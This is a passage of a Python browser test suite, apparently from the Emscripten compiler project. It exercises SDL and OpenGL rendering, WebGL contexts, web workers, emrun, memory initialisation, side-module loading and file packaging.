def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
self.compile_btest([path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
for wasm in [0, 1]:
if not wasm and self.is_wasm_backend():
continue
print(wasm)
main, supp = self.setup_runtimelink_test()
create_test_file('supp.cpp', supp)
self.compile_btest(['supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
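# The console.warn hook above turns the "problem ... with Module.memoryInitializerRequest" warning
# into a reported result of 0, so test('test.html.mem', '1') covers the working path and
# test('nothing.nowhere', '0') checks that a bad memory-init URL is detected and reported.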
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
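# post_test exercises ccall, cwrap and direct calls before the runtime is ready: with the default
# expected_ok = false every call is expected to abort with an assertion, while the "runtime still
# alive" variant further below flips expected_ok to true and expects all three calls to succeed.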
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [['-s', 'WASM=0'], ['-s', 'WASM=1']]:
if 'WASM=0' in mode and self.is_wasm_backend():
continue
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
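# Renaming the side module to .so and preloading the directory below with --use-preload-plugins
# should make the runtime precompile it and register it under Module['preloadedWasm'], which is
# exactly what the EM_ASM_INT check in main() asserts before attempting dlopen().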
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
self.compile_btest([path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
outdir = os.getcwd()
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory that the suite will clean up afterwards: the launched
# browser uses that directory as its startup directory and will not close as part of the test, which
# pins down the cwd on Windows and makes it impossible to delete. Therefore switch away from that
# directory before launching.
os.chdir(path_from_root())
args_base = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
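# emrun is exercised twice below: once with the base arguments and once with --no_private_browsing
# on a separate port (presumably so the second browser instance does not collide with the first);
# both runs must exit with code 100 and produce the expected stdout/stderr logs.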
for args in [
args_base,
args_base + ['--no_private_browsing', '--port', '6941']
]:
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
proc = run_process(args, check=False)
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert proc.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that building with --cpuprofiler and --memoryprofiler succeeds.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.compile_btest(['-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
@requires_threads
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
[],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'USE_WEBGL2=1', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
@no_wasm_backend('asm.js-specific')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
# in the emterpreter, check the special assertions mode as well
if not self.is_wasm_backend():
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASSERTIONS=1'] + self.get_async_args())
def test_locate_file(self):
for wasm in ([0, 1] if not self.is_wasm_backend() else [1]):
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
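# page.html itself stays in the current directory; only the secondary assets (.wasm or .html.mem,
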